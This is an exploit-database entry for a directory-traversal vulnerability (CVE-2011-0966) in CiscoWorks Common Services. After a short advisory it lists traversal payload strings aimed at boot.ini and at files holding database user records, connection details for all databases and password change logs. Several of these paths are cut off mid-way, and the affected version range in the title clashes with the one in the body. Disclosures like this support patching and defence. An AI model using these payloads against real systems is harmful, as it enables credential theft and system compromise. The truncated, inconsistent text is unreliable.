CiscoWorks Common Services <= 3.1.1 Auditing Directory Traversal Vulnerability

ID EDB-ID:35781
Type exploitdb
Reporter Sense of Security
Modified 2011-05-18T00:00:00


CiscoWorks Common Services 3.1.1 Auditing Directory Traversal Vulnerability. CVE-2011-0966. Webapps exploit for java platform


CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.

This issue is being monitored by Cisco Bug ID CSCto35577.

CiscoWorks Common Services 3.3 and prior are vulnerable.\..\..\..\..\..\..\boot.ini
cmfDBA user database info:\..\..\..\..\..\..\Program
Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\ DB connection info for all databases:\..\..\..\..\..\..\Program

Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.
DB password change log:\..\..\..\..\..\..\Program